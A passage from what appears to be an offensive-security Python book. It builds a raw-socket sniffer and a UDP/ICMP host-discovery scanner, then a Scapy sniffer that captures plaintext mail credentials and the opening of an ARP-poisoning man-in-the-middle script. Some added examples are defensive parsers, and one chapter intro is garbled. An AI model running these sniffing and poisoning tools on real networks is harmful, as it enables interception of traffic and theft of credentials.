We start by constructing our socket object with the parameters necessary for sniffing packets on our network interface ➊. The difference between Windows and Linux is that Windows will allow us to sniff all incoming packets regardless of protocol, whereas Linux forces us to specify that we are sniffing ICMP (an AF_INET raw socket on Linux only ever delivers one IP protocol; to see everything you would open an AF_PACKET socket instead, which is more than we need here). Note that we are using promiscuous mode, which requires administrative privileges on Windows or root on Linux (raw sockets themselves need that privilege on both platforms). Promiscuous mode allows us to sniff all packets that the network card sees, even those not destined for your specific host. Next we set a socket option ➋ that includes the IP headers in our captured packets. The next step ➌ is to determine if we are using Windows, and if so, we perform the additional step of sending an IOCTL to the network card driver to enable promiscuous mode. If you're running Windows in a virtual machine, you will likely get a notification that the guest operating system is enabling promiscuous mode; you, of course, will allow it. Now we are ready to actually perform some sniffing, and in this case we are simply printing out the entire raw packet ➍ with no packet decoding. This is just to test to make sure we have the core of our sniffing code working. After a single packet is sniffed, we again test for Windows, and disable promiscuous mode ➎ before exiting the script.

Kicking the Tires

Open up a fresh terminal or cmd.exe shell under Windows and run the following:

python sniffer.py

In another terminal or shell window, you can simply pick a host to ping. Here, we'll ping nostarch.com:

ping nostarch.com

In your first window where you executed your sniffer, you should see some garbled output that closely resembles the following:

('E\x00\x00:\x0f\x98\x00\x00\x80\x11\xa9\x0e\xc0\xa8\x00\xbb\xc0\xa8\x00\x01\x04\x01\x005\x00&\xd6d\n\xde\x01\x00\x00\x01\x00\x00\x00\x00\x00\x00\x08nostarch\x03com\x00\x00\x01\x00\x01', ('192.168.0.187', 0))

What we captured here is not the ICMP echo request itself but the DNS lookup that ping performs first in order to resolve nostarch.com: byte 9 of the IP header is \x11 (protocol 17, UDP), the destination port bytes \x005 are port 53, and the query name nostarch.com is visible in the payload. On Windows the IPPROTO_IP raw socket hands us every protocol, so this UDP packet arrives before any ICMP traffic. If you are running this example on Linux, the socket only delivers ICMP, so the first thing you see will be the echo reply from nostarch.com. Sniffing one packet is not overly useful, so let's add some functionality to process more packets and decode their contents.

Decoding the IP Layer

In its current form, our sniffer receives all of the IP headers along with any higher protocols such as TCP, UDP, or ICMP. The information is packed into binary form, and as shown above, is quite difficult to understand. We are now going to work on decoding the IP portion of a packet so that we can pull useful information out such as the protocol type (TCP, UDP, ICMP), and the source and destination IP addresses. This will be the foundation for you to start creating further protocol parsing later on.

If we examine what an actual packet looks like on the network, you will have an understanding of how we need to decode the incoming packets. Refer to Figure 3-1 for the makeup of an IP header.

Figure 3-1. Typical IPv4 header structure

We will decode the entire IP header (except the Options field) and extract the protocol type, source, and destination IP address. Using the Python ctypes module to create a C-like structure will allow us to have a friendly format for handling the IP header and its member fields. First, let's take a look at the C definition of what an IP header looks like.

struct ip {
    u_char  ip_hl:4;
    u_char  ip_v:4;
    u_char  ip_tos;
    u_short ip_len;
    u_short ip_id;
    u_short ip_off;
    u_char  ip_ttl;
    u_char  ip_p;
    u_short ip_sum;
    u_long  ip_src;
    u_long  ip_dst;
}

You now have an idea of how to map the C data types to the IP header values. Using C code as a reference when translating to Python objects can be useful because it makes it seamless to convert them to pure Python. Of note, the ip_hl and ip_v fields have a bit notation added to them (the :4 part). This indicates that these are bit fields, and they are 4 bits wide. On a little-endian machine the compiler (and ctypes, which follows it) fills bit fields starting from the low bits of the byte, so declaring ip_hl first maps it onto the low nibble and ip_v onto the high nibble, which is exactly how the first byte of an IPv4 header is laid out. That is why we can mirror this declaration in Python and avoid doing any bit manipulation ourselves. One size caveat: u_long, like the ctypes c_ulong, is 4 bytes on Windows and 32-bit Linux but 8 bytes on 64-bit Linux. The two address fields must be 32-bit values (c_uint32 in ctypes), or the structure grows to 28 bytes and from_buffer_copy refuses a 20-byte slice.

Let's implement our IP decoding routine in sniffer_ip_header_decode.py as shown below.
import socket
import os
import struct
from ctypes import *

# host to listen on
host = "192.168.0.187"

# our IP header
class IP(Structure):  # ➊
    _fields_ = [
        ("ihl",          c_ubyte, 4),
        ("version",      c_ubyte, 4),
        ("tos",          c_ubyte),
        ("len",          c_ushort),
        ("id",           c_ushort),
        ("offset",       c_ushort),
        ("ttl",          c_ubyte),
        ("protocol_num", c_ubyte),
        ("sum",          c_ushort),
        # c_uint32 rather than c_ulong: c_ulong is 8 bytes on 64-bit Linux, which
        # would make the structure 28 bytes and from_buffer_copy() reject 20 bytes
        ("src",          c_uint32),
        ("dst",          c_uint32)
    ]

    def __new__(self, socket_buffer=None):
        return self.from_buffer_copy(socket_buffer)

    def __init__(self, socket_buffer=None):
        # map protocol constants to their names
        self.protocol_map = {1: "ICMP", 6: "TCP", 17: "UDP"}

        # human readable IP addresses  ➋
        # the address fields were read as little-endian integers on x86, so
        # pack them back the same way to recover the original 4 network-order bytes
        self.src_address = socket.inet_ntoa(struct.pack("<L", self.src))
        self.dst_address = socket.inet_ntoa(struct.pack("<L", self.dst))

        # human readable protocol
        try:
            self.protocol = self.protocol_map[self.protocol_num]
        except KeyError:
            self.protocol = str(self.protocol_num)

# this should look familiar from the previous example
if os.name == "nt":
    socket_protocol = socket.IPPROTO_IP
else:
    socket_protocol = socket.IPPROTO_ICMP

sniffer = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket_protocol)

sniffer.bind((host, 0))
sniffer.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1)

if os.name == "nt":
    sniffer.ioctl(socket.SIO_RCVALL, socket.RCVALL_ON)

try:
    while True:
        # read in a packet
        raw_buffer = sniffer.recvfrom(65565)[0]  # ➌

        # create an IP header from the first 20 bytes of the buffer
        ip_header = IP(raw_buffer[0:20])  # ➍

        # print out the protocol that was detected and the hosts
        print "Protocol: %s %s -> %s" % (ip_header.protocol, ip_header.src_address, ip_header.dst_address)  # ➎

# handle CTRL-C
except KeyboardInterrupt:
    # if we're using Windows, turn off promiscuous mode
    if os.name == "nt":
        sniffer.ioctl(socket.SIO_RCVALL, socket.RCVALL_OFF)
The first step is defining a Python ctypes structure ➊ that will map the first 20 bytes of the received buffer into a friendly IP header. As you can see, all of the fields that we identified and the preceding C structure match up nicely. The __new__ method of the IP class simply takes in a raw buffer (in this case, what we receive on the network) and forms the structure from it. When the __init__ method is called, __new__ is already finished processing the buffer. Inside __init__, we are simply doing some housekeeping to give some human readable output for the protocol in use and the IP addresses ➋.

With our freshly minted IP structure, we now put in the logic to continually read in packets and parse their information. The first step is to read in the packet ➌ and then pass the first 20 bytes ➍ to initialize our IP structure. Next, we simply print out the information that we have captured ➎. Let's try it out.

Kicking the Tires

Let's test out our previous code to see what kind of information we are extracting from the raw packets being sent. I definitely recommend that you do this test from your Windows machine, as you will be able to see TCP, UDP, and ICMP, which allows you to do some pretty neat testing (open up a browser, for example). If you are confined to Linux, then perform the previous ping test to see it in action.

Open a terminal and type:

python sniffer_ip_header_decode.py

Now, because Windows is pretty chatty, you're likely to see output immediately. I tested this script by opening Internet Explorer and going to www.google.com, and here is the output from our script:

Protocol: UDP 192.168.0.190 -> 192.168.0.1
Protocol: UDP 192.168.0.1 -> 192.168.0.190
Protocol: UDP 192.168.0.190 -> 192.168.0.187
Protocol: TCP 192.168.0.187 -> 74.125.225.183
Protocol: TCP 192.168.0.187 -> 74.125.225.183
Protocol: TCP 74.125.225.183 -> 192.168.0.187
Protocol: TCP 192.168.0.187 -> 74.125.225.183

Because we aren't doing any deep inspection on these packets, we can only guess what this stream is indicating. My guess is that the first couple of UDP packets are the DNS queries to determine where google.com lives, and the subsequent TCP sessions are my machine actually connecting and downloading content from their web server.

To perform the same test on Linux, we can ping google.com, and the results will look something like this:

Protocol: ICMP 74.125.226.78 -> 192.168.0.190
Protocol: ICMP 74.125.226.78 -> 192.168.0.190
Protocol: ICMP 74.125.226.78 -> 192.168.0.190

You can already see the limitation: we are only seeing the response and only for the ICMP protocol. But because we are purposefully building a host discovery scanner, this is completely acceptable. We will now apply the same techniques we used to decode the IP header to decode the ICMP messages.

Decoding ICMP

Now that we can fully decode the IP layer of any sniffed packets, we have to be able to decode the ICMP responses that our scanner will elicit from sending UDP datagrams to closed ports. ICMP messages can vary greatly in their contents, but each message contains three elements that stay consistent: the type, code, and checksum fields. The type and code fields tell the receiving host what type of ICMP message is arriving, which then dictates how to decode it properly.

For the purpose of our scanner, we are looking for a type value of 3 and a code value of 3. This corresponds to the Destination Unreachable class of ICMP messages, and the code value of 3 indicates that the Port Unreachable error has been caused. Refer to Figure 3-2 for a diagram of a Destination Unreachable ICMP message.

Figure 3-2. Diagram of Destination Unreachable ICMP message

As you can see, the first 8 bits are the type and the second 8 bits contain our ICMP code. One interesting thing to note is that when a host sends one of these ICMP messages, it actually includes the IP header of the originating message that generated the response, followed by at least the first 8 bytes of the original datagram. RFC 792 only guarantees those 8 bytes (exactly the UDP header); most modern stacks quote considerably more (Linux, per RFC 1812, includes as much of the offending packet as fits in a 576-byte ICMP message). That quoted data is what lets us double-check that our scanner generated the ICMP response: we simply slice off the last bytes of the received buffer and compare them to the magic string that our scanner sends. If a responder quotes only the minimum 8 bytes, that check fails and the host goes unreported, which is worth remembering when the replies come from routers or hardened hosts.

Let's add some more code to our previous sniffer to include the ability to decode ICMP packets. Let's save our previous file as sniffer_with_icmp.py and add the following code:
--snip--
class IP(Structure):
--snip--

class ICMP(Structure):  # ➊
    _fields_ = [
        ("type",         c_ubyte),
        ("code",         c_ubyte),
        ("checksum",     c_ushort),
        ("unused",       c_ushort),
        ("next_hop_mtu", c_ushort)
    ]

    def __new__(self, socket_buffer):
        return self.from_buffer_copy(socket_buffer)

    def __init__(self, socket_buffer):
        pass

--snip--
        print "Protocol: %s %s -> %s" % (ip_header.protocol, ip_header.src_address, ip_header.dst_address)

        # if it's ICMP, we want it
        if ip_header.protocol == "ICMP":  # ➋

            # calculate where our ICMP packet starts
            offset = ip_header.ihl * 4  # ➌
            buf = raw_buffer[offset:offset + sizeof(ICMP)]

            # create our ICMP structure
            icmp_header = ICMP(buf)  # ➍

            print "ICMP -> Type: %d Code: %d" % (icmp_header.type, icmp_header.code)
This simple piece of code creates an ICMP structure ➊ underneath our existing IP structure. When the main packet-receiving loop determines that we have received an ICMP packet ➋, we calculate the offset in the raw packet where the ICMP body lives ➌ and then create our buffer ➍ and print out the type and code fields. The length calculation is based on the IP header ihl field, which indicates the number of 32-bit words (4-byte chunks) contained in the IP header. So by multiplying this field by 4, we know the size of the IP header and thus when the next network layer (ICMP in this case) begins.

If we quickly run this code with our typical ping test, our output should now be slightly different, as shown below:

Protocol: ICMP 74.125.226.78 -> 192.168.0.190
ICMP -> Type: 0 Code: 0

This indicates that the ping (ICMP Echo) responses are being correctly received and decoded. We are now ready to implement the last bit of logic to send out the UDP datagrams, and to interpret their results.

Now let's add the use of the netaddr module so that we can cover an entire subnet with our host discovery scan. Save your sniffer_with_icmp.py script as scanner.py and add the following code:
import threading
import time
from netaddr import IPNetwork, IPAddress
--snip--

# host to listen on
host = "192.168.0.187"

# subnet to target
subnet = "192.168.0.0/24"

# magic string we'll check ICMP responses for
magic_message = "PYTHONRULES!"  # ➊

# this sprays out the UDP datagrams
def udp_sender(subnet, magic_message):  # ➋
    time.sleep(5)
    sender = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)

    for ip in IPNetwork(subnet):
        try:
            sender.sendto(magic_message, ("%s" % ip, 65212))
        except:
            pass
--snip--

# start sending packets
t = threading.Thread(target=udp_sender, args=(subnet, magic_message))  # ➌
t.start()
--snip--
try:
    while True:
--snip--
            #print "ICMP -> Type: %d Code: %d" % (icmp_header.type, icmp_header.code)

            # now check for the TYPE 3 and CODE 3
            if icmp_header.code == 3 and icmp_header.type == 3:

                # make sure host is in our target subnet
                if IPAddress(ip_header.src_address) in IPNetwork(subnet):  # ➍

                    # make sure it has our magic message
                    if raw_buffer[len(raw_buffer) - len(magic_message):] == magic_message:  # ➎
                        print "Host Up: %s" % ip_header.src_address
This last bit of code should be fairly straightforward to understand. We define a simple string signature ➊ so that we can test that the responses are coming from UDP packets that we sent originally. Our udp_sender function ➋ simply takes in a subnet that we specify at the top of our script, iterates through all IP addresses in that subnet, and fires UDP datagrams at them. In the main body of our script, just before the main packet decoding loop, we spawn udp_sender in a separate thread ➌ to ensure that we aren't interfering with our ability to sniff responses. If we detect the anticipated ICMP message, we first check to make sure that the ICMP response is coming from within our target subnet ➍. We then perform our final check of making sure that the ICMP response has our magic string in it ➎. If all of these checks pass, we print out the source IP address of where the ICMP message originated. Let's try it out.
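The three decoding steps the scanner relies on (the IP header, the ICMP header, and the quoted copy of our probe) are worth seeing together in one place, against a packet you can inspect byte by byte. The following is an added example (Python 3) and not the book's code: it does what the IP, ICMP and magic-string checks above do, but with the struct module instead of ctypes (so there is no c_ulong sizing surprise on 64-bit Linux), and it goes a little further than the scanner does, verifying both checksums and walking into the quoted IP and UDP headers rather than trusting the tail of the buffer. The target-subnet test uses the standard-library ipaddress module in place of netaddr. The sample reply, the addresses, and the probe source port are constructed for the demonstration, not captured; the same functions would accept a buffer straight from sniffer.recvfrom().

```python
import ipaddress
import socket
import struct

IPV4_HDR = struct.Struct("!BBHHHBBH4s4s")  # 20-byte header, network byte order
ICMP_HDR = struct.Struct("!BBHHH")         # type, code, checksum, unused, next-hop MTU
MAGIC = b"PYTHONRULES!"                    # the marker the scanner puts in every probe


def checksum(data):
    """RFC 1071 one's-complement sum; returns 0 for a buffer whose checksum is valid."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return ~total & 0xFFFF


def parse_ipv4(buf):
    """Split a raw IPv4 packet into (header dict, payload); ValueError if it is not sane."""
    if len(buf) < 20:
        raise ValueError("truncated IPv4 header")
    vi, _tos, length, _id, _off, ttl, proto, _csum, src, dst = IPV4_HDR.unpack(buf[:20])
    version, ihl = vi >> 4, vi & 0x0F   # high nibble = version, low nibble = IHL
    hlen = ihl * 4                      # IHL counts 32-bit words; options push it past 20
    if version != 4 or ihl < 5 or len(buf) < hlen:
        raise ValueError("not a complete IPv4 header")
    if checksum(buf[:hlen]) != 0:
        raise ValueError("bad IPv4 header checksum")
    hdr = {"ihl": ihl, "len": length, "ttl": ttl, "proto": proto,
           "src": socket.inet_ntoa(src), "dst": socket.inet_ntoa(dst)}
    return hdr, buf[hlen:length]


def parse_port_unreachable(icmp, magic):
    """If `icmp` is a Destination Unreachable / Port Unreachable message quoting one
    of our UDP probes, return (probed host, probed port); otherwise None."""
    if len(icmp) < 8:
        return None
    itype, code, _csum, _unused, _mtu = ICMP_HDR.unpack(icmp[:8])
    if (itype, code) != (3, 3) or checksum(icmp) != 0:
        return None
    try:  # the message quotes the original IP header plus >= 8 bytes of the datagram
        inner_hdr, inner_payload = parse_ipv4(icmp[8:])
    except ValueError:
        return None
    if inner_hdr["proto"] != 17 or len(inner_payload) < 8:
        return None
    _sport, dport, _ulen, _ucsum = struct.unpack("!HHHH", inner_payload[:8])
    # RFC 792 guarantees only those 8 bytes (the UDP header); the magic string is
    # visible only if the responder quoted more, which most modern stacks do
    if not inner_payload[8:].endswith(magic):
        return None
    return inner_hdr["dst"], dport


def host_from_reply(raw, magic=MAGIC, subnet="192.168.0.0/24"):
    """The scanner's decision for one sniffed packet: the replying host's address if
    `raw` is a valid ICMP answer to our probe from inside `subnet`, else None."""
    hdr, payload = parse_ipv4(raw)
    if hdr["proto"] != 1:
        return None
    if ipaddress.ip_address(hdr["src"]) not in ipaddress.ip_network(subnet):
        return None
    if parse_port_unreachable(payload, magic) is None:
        return None
    return hdr["src"]


# --- builders for the constructed sample packets below (not a real capture) ---
def build_ipv4(src, dst, proto, payload, ttl=64):
    hdr = IPV4_HDR.pack(0x45, 0, 20 + len(payload), 0x1234, 0, ttl, proto, 0,
                        socket.inet_aton(src), socket.inet_aton(dst))
    hdr = hdr[:10] + struct.pack("!H", checksum(hdr)) + hdr[12:]
    return hdr + payload


def make_sample_reply(scanner="192.168.0.187", target="192.168.0.190", quote=None):
    """The ICMP Port Unreachable `target` would send for our probe to UDP/65212;
    `quote` caps how many bytes of the offending datagram the responder includes."""
    udp = struct.pack("!HHHH", 40000, 65212, 8 + len(MAGIC), 0) + MAGIC  # csum 0 = none
    probe = build_ipv4(scanner, target, 17, udp)
    quoted = probe if quote is None else probe[:quote]
    icmp = ICMP_HDR.pack(3, 3, 0, 0, 0) + quoted
    icmp = icmp[:2] + struct.pack("!H", checksum(icmp)) + icmp[4:]
    return build_ipv4(target, scanner, 1, icmp)


if __name__ == "__main__":
    print("Host Up: %s" % host_from_reply(make_sample_reply()))
    print("8-byte quote only: %r" % host_from_reply(make_sample_reply(quote=28)))
```

Run it as is and the first line reports 192.168.0.190; the second shows the failure mode discussed above, a responder that quotes only the IP header plus 8 bytes, which carries the UDP header but not our magic string and so is (correctly, by the scanner's rules) not reported.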

Kicking the Tires

Now let's take our scanner and run it against the local network. You can use Linux or Windows for this as the results will be the same. In my case, the IP address of the local machine I was on was 192.168.0.187, so I set my scanner to hit 192.168.0.0/24. If the output is too noisy when you run your scanner, simply comment out all print statements except for the last one that tells you what hosts are responding.
THE NETADDR MODULE

Our scanner is going to use a third-party library called netaddr, which will allow us to feed in a subnet mask such as 192.168.0.0/24 and have our scanner handle it appropriately. Download the library from here: http://code.google.com/p/netaddr/downloads/list

Or, if you installed the Python setuptools package in Chapter 1, you can simply execute the following from a command prompt:

easy_install netaddr

The netaddr module makes it very easy to work with subnets and addressing. For example, you can run simple tests like the following using the IPNetwork object:

ip_address = "192.168.112.3"
if ip_address in IPNetwork("192.168.112.0/24"):
    print True

Or you can create simple iterators if you want to send packets to an entire network:

for ip in IPNetwork("192.168.112.1/24"):
    s = socket.socket()
    s.connect((str(ip), 25))   # IPNetwork yields IPAddress objects; sockets want a string
    # send mail packets

This will greatly simplify your programming life when dealing with entire networks at a time, and it is ideally suited for our host discovery tool. After it's installed, you are ready to proceed.
c:\Python27\python.exe scanner.py
Host Up: 192.168.0.1
Host Up: 192.168.0.190
Host Up: 192.168.0.192
Host Up: 192.168.0.195

For a quick scan like the one I performed, it only took a few seconds to get the results back. By cross-referencing these IP addresses with the DHCP table in my home router, I was able to verify that the results were accurate. You can easily expand what you've learned in this chapter to decode TCP and UDP packets, and build additional tooling around it. This scanner is also useful for the trojan framework we will begin building in Chapter 7. This would allow a deployed trojan to scan the local network looking for additional targets. Now that we have the basics down of how networks work on a high and low level, let's explore a very mature Python library called Scapy.
[7] An input/output control (IOCTL) is a means for user space programs to communicate with kernel mode components. Have a read here: http://en.wikipedia.org/wiki/Ioctl.

Chap te r 4 . O wnin g t h e N etw ork w it h S ca p y
Occasio nally , y o u r u n i n to s u ch a w ell th o ught- o ut, a m azin g P yth o n l ib ra ry th at d ed ic ati n g a w ho le
chap te r to i t c an’t d o i t j u sti c e. P hilip pe B io nd i h as c re ate d s u ch a l ib ra ry i n th e p acket m anip ula ti o n
lib ra ry S cap y. Y ou j u st m ig ht f in is h th is c hap te r a nd r e aliz e th at I m ad e y o u d o a l o t o f w ork i n th e
pre v io us tw o c hap te rs th at y o u c o uld h av e d one w ith j u st o ne o r tw o l in es o f S cap y. S cap y i s
pow erfu l a nd f le xib le , a nd th e p ossib iliti e s a re a lm ost i n fin ite . W e’ll g et a ta ste o f th in gs b y s n iffin g
to s te al p la in te xt e m ail c re d enti a ls a nd th en A RP p ois o nin g a ta rg et m achin e o n o ur n etw ork s o th at
we c an s n iff th eir tr a ffic . W e’ll w ra p th in gs u p b y d em onstr a ti n g h o w S cap y’s P C A P p ro cessin g c an
be e xte nd ed to c arv e o ut i m ages f r o m H TTP tr a ffic a nd th en p erfo rm f a cia l d ete cti o n o n th em to
dete rm in e i f th ere a re h um ans p re se nt i n th e i m ages.
I recommend that you use Scapy under a Linux system, as it was designed to work with Linux in mind. The newest version of Scapy does support Windows,[8] but for the purpose of this chapter I will assume you are using your Kali VM that has a fully functioning Scapy installation. If you don't have Scapy, head on over to http://www.secdev.org/projects/scapy/ to install it.

Stealing Email Credentials
You have already spent some time getting into the nuts and bolts of sniffing in Python. So let's get to know Scapy's interface for sniffing packets and dissecting their contents. We are going to build a very simple sniffer to capture SMTP, POP3, and IMAP credentials. Later, by coupling our sniffer with our Address Resolution Protocol (ARP) poisoning man-in-the-middle (MITM) attack, we can easily steal credentials from other machines on the network. This technique can of course be applied to any protocol or to simply suck in all traffic and store it in a PCAP file for analysis, which we will also demonstrate.
To get a feel for Scapy, let's start by building a skeleton sniffer that simply dissects and dumps the packets out. The aptly named sniff function looks like the following:

sniff(filter="",iface="any",prn=function,count=N)
The filter parameter allows us to specify a BPF (Wireshark-style) filter to the packets that Scapy sniffs, which can be left blank to sniff all packets. For example, to sniff all HTTP packets you would use a BPF filter of tcp port 80. The iface parameter tells the sniffer which network interface to sniff on; if left blank, Scapy will sniff on all interfaces. The prn parameter specifies a callback function to be called for every packet that matches the filter, and the callback function receives the packet object as its single parameter. The count parameter specifies how many packets you want to sniff; if left blank, Scapy will sniff indefinitely.
Let's start by creating a simple sniffer that sniffs a packet and dumps its contents. We'll then expand it to only sniff email-related commands. Crack open mail_sniffer.py and jam out the following code:
from scapy.all import *

# our packet callback
def packet_callback(packet):  # ➊
    print packet.show()

# fire up our sniffer
sniff(prn=packet_callback,count=1)  # ➋
We start by defining our callback function that will receive each sniffed packet ➊ and then simply tell Scapy to start sniffing ➋ on all interfaces with no filtering. Now let's run the script and you should see output similar to what you see below.
$ python2.7 mail_sniffer.py
WARNING: No route found for IPv6 destination :: (no default route?)
###[ Ethernet ]###
  dst       = 10:40:f3:ab:71:02
  src       = 00:18:e7:ff:5c:f8
  type      = 0x800
###[ IP ]###
     version   = 4L
     ihl       = 5L
     tos       = 0x0
     len       = 52
     id        = 35232
     flags     = DF
     frag      = 0L
     ttl       = 51
     proto     = tcp
     chksum    = 0x4a51
     src       = 195.91.239.8
     dst       = 192.168.0.198
     \options   \
###[ TCP ]###
        sport     = etlservicemgr
        dport     = 54000
        seq       = 4154787032
        ack       = 2619128538
        dataofs   = 8L
        reserved  = 0L
        flags     = A
        window    = 330
        chksum    = 0x80a2
        urgptr    = 0
        options   = [('NOP', None), ('NOP', None), ('Timestamp', (1960913461, 764897985))]
None
How incredibly easy was that! We can see that when the first packet was received on the network, our callback function used the built-in function packet.show() to display the packet contents and to dissect some of the protocol information. Using show() is a great way to debug scripts as you are going along to make sure you are capturing the output you want.
Now that we have our basic sniffer running, let's apply a filter and add some logic to our callback function to peel out email-related authentication strings.
from scapy.all import *

# our packet callback
def packet_callback(packet):

    if packet[TCP].payload:  # ➊

        mail_packet = str(packet[TCP].payload)

        if "user" in mail_packet.lower() or "pass" in mail_packet.lower():  # ➋
            print "[*] Server: %s" % packet[IP].dst
            print "[*] %s" % packet[TCP].payload  # ➌

# fire up our sniffer
sniff(filter="tcp port 110 or tcp port 25 or tcp port 143",prn=packet_callback,store=0)  # ➍
Pretty straightforward stuff here. We changed our sniff function to add a filter that only includes traffic destined for the common mail ports 110 (POP3), 143 (IMAP), and SMTP (25) ➍. We also used a new parameter called store, which when set to 0 ensures that Scapy isn't keeping the packets in memory. It's a good idea to use this parameter if you intend to leave a long-term sniffer running because then you won't be consuming vast amounts of RAM. When our callback function is called, we check to make sure it has a data payload ➊ and whether the payload contains the typical USER or PASS mail commands ➋. If we detect an authentication string, we print out the server we are sending it to and the actual data bytes of the packet ➌.

Kicking the Tires
Here is some example output from a dummy email account I attempted to connect my mail client to:
[*] Server: 25.57.168.12
[*] USER jms
[*] Server: 25.57.168.12
[*] PASS justin
[*] Server: 25.57.168.12
[*] USER jms
[*] Server: 25.57.168.12
[*] PASS test
You can see that my mail client is attempting to log in to the server at 25.57.168.12 and sending the plaintext credentials over the wire. This is a really simple example of how you can take a Scapy sniffing script and turn it into a useful tool during penetration tests.
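The substring check at ➋ fires on any payload that happens to contain "user" or "pass", and it misses the forms SMTP and IMAP actually use (AUTH PLAIN, tagged LOGIN). Below is an added example, not code from the book, of the same detection written as a defensive monitor for cleartext mail logins on the three ports from the BPF filter: it matches the real command shapes, reports protocol and username, and never records the password. The (port, payload) pairs are constructed stand-ins for what a Scapy callback sees in packet[TCP].dport and str(packet[TCP].payload).

```python
import base64
import re

# Mail ports from the book's BPF filter, mapped to the protocol expected on each.
MAIL_PORTS = {25: "smtp", 110: "pop3", 143: "imap"}

POP3_RE = re.compile(r"^(USER|PASS)\s+(\S+)\s*$", re.IGNORECASE)
IMAP_RE = re.compile(r"^\S+\s+LOGIN\s+(\S+)\s+\S+\s*$", re.IGNORECASE)   # tag LOGIN user pass
SMTP_RE = re.compile(r"^AUTH\s+(PLAIN|LOGIN)(?:\s+(\S+))?\s*$", re.IGNORECASE)


def classify_payload(dport, payload):
    """Return {"proto", "command", "user"} when payload carries a plaintext login on a
    mail port, else None. The password is never kept: an alert needs to show that a
    secret crossed the wire in the clear, not what it was."""
    proto = MAIL_PORTS.get(dport)
    if proto is None:
        return None
    line = payload.decode("latin-1").rstrip("\r\n")
    if proto == "pop3":
        m = POP3_RE.match(line)
        if m:
            cmd = m.group(1).upper()
            return {"proto": proto, "command": cmd,
                    "user": m.group(2) if cmd == "USER" else None}
    elif proto == "imap":
        m = IMAP_RE.match(line)
        if m:
            return {"proto": proto, "command": "LOGIN", "user": m.group(1).strip('"')}
    elif proto == "smtp":
        m = SMTP_RE.match(line)
        if m:
            mech, blob = m.group(1).upper(), m.group(2)
            user = None
            if mech == "PLAIN" and blob:
                # SASL PLAIN is base64("authzid\0authcid\0password"); keep only authcid.
                try:
                    parts = base64.b64decode(blob, validate=True).split(b"\x00")
                    if len(parts) == 3:
                        user = parts[1].decode("utf-8", "replace")
                except ValueError:
                    pass
            # AUTH LOGIN sends user and password as later bare base64 lines; a
            # stateful tracker would be needed to attribute those, so only the
            # command itself is reported here.
            return {"proto": proto, "command": "AUTH " + mech, "user": user}
    return None


def scan_packets(packets):
    """Run the classifier over (dport, payload) pairs and collect the findings."""
    findings = []
    for dport, payload in packets:
        hit = classify_payload(dport, payload)
        if hit is not None:
            findings.append(hit)
    return findings


# Constructed sample payloads (not captured traffic), mirroring the book's output.
SAMPLE_PACKETS = [
    (110, b"USER jms\r\n"),
    (110, b"PASS justin\r\n"),
    (143, b'a001 LOGIN jms "test"\r\n'),
    (25, b"AUTH PLAIN " + base64.b64encode(b"\x00jms\x00test") + b"\r\n"),
    (25, b"MAIL FROM:<jms@example.com>\r\n"),          # ordinary SMTP, no credential
    (80, b"GET /passthrough HTTP/1.1\r\n"),            # would trip a naive "pass" check
]

if __name__ == "__main__":
    for f in scan_packets(SAMPLE_PACKETS):
        print("[*] cleartext %s %s user=%s" % (f["proto"], f["command"], f["user"]))
```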
Sniffing your own traffic might be fun, but it's always better to sniff with a friend, so let's take a look at how you can perform an ARP poisoning attack to sniff the traffic of a target machine on the same network.

ARP Cache Poisoning with Scapy
ARP poisoning is one of the oldest yet most effective tricks in a hacker's toolkit. Quite simply, we will convince a target machine that we have become its gateway, and we will also convince the gateway that in order to reach the target machine, all traffic has to go through us. Every computer on a network maintains an ARP cache that stores the most recent MAC addresses that match to IP addresses on the local network, and we are going to poison this cache with entries that we control to achieve this attack. Because the Address Resolution Protocol and ARP poisoning in general is covered in numerous other materials, I'll leave it to you to do any necessary research to understand how this attack works at a lower level.
Now that we know what we need to do, let's put it into practice. When I tested this, I attacked a real Windows machine and used my Kali VM as my attacking machine. I have also tested this code against various mobile devices connected to a wireless access point and it worked great. The first thing we'll do is check the ARP cache on the target Windows machine so we can see our attack in action later on. Examine the following to see how to inspect the ARP cache on your Windows VM.
C:\Users\Clare> ipconfig

Windows IP Configuration

Wireless LAN adapter Wireless Network Connection:

   Connection-specific DNS Suffix . : gateway.pace.com
   Link-local IPv6 Address . . . . . : fe80::34a0:48cd:579:a3d9%11
   IPv4 Address. . . . . . . . . . . : 172.16.1.71
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
➊  Default Gateway . . . . . . . . . : 172.16.1.254

C:\Users\Clare> arp -a

Interface: 172.16.1.71 --- 0xb
  Internet Address      Physical Address      Type
➋ 172.16.1.254          3c-ea-4f-2b-41-f9     dynamic
  172.16.1.255          ff-ff-ff-ff-ff-ff     static
  224.0.0.22            01-00-5e-00-00-16     static
  224.0.0.251           01-00-5e-00-00-fb     static
  224.0.0.252           01-00-5e-00-00-fc     static
  255.255.255.255       ff-ff-ff-ff-ff-ff     static
So now we can see that the gateway IP address ➊ is at 172.16.1.254 and its associated ARP cache entry ➋ has a MAC address of 3c-ea-4f-2b-41-f9. We will take note of this because we can view the ARP cache while the attack is ongoing and see that we have changed the gateway's registered MAC address. Now that we know the gateway and our target IP address, let's begin coding our ARP poisoning script. Open a new Python file, call it arper.py, and enter the following code:
from scapy.all import *
import os
import sys
import threading
import signal
import time   # used by poison_target's sleep between rounds

interface = "en1"
target_ip = "172.16.1.71"
gateway_ip = "172.16.1.254"
packet_count = 1000

# set our interface
conf.iface = interface

# turn off output
conf.verb = 0

print "[*] Setting up %s" % interface

gateway_mac = get_mac(gateway_ip)  # ➊

if gateway_mac is None:
    print "[!!!] Failed to get gateway MAC. Exiting."
    sys.exit(0)
else:
    print "[*] Gateway %s is at %s" % (gateway_ip,gateway_mac)

target_mac = get_mac(target_ip)  # ➋

if target_mac is None:
    print "[!!!] Failed to get target MAC. Exiting."
    sys.exit(0)
else:
    print "[*] Target %s is at %s" % (target_ip,target_mac)

# start poison thread
poison_thread = threading.Thread(target = poison_target, args = (gateway_ip, gateway_mac,target_ip,target_mac))  # ➌
poison_thread.start()

try:
    print "[*] Starting sniffer for %d packets" % packet_count

    bpf_filter = "ip host %s" % target_ip
    packets = sniff(count=packet_count,filter=bpf_filter,iface=interface)  # ➍

    # write out the captured packets
    wrpcap('arper.pcap',packets)  # ➎

    # restore the network
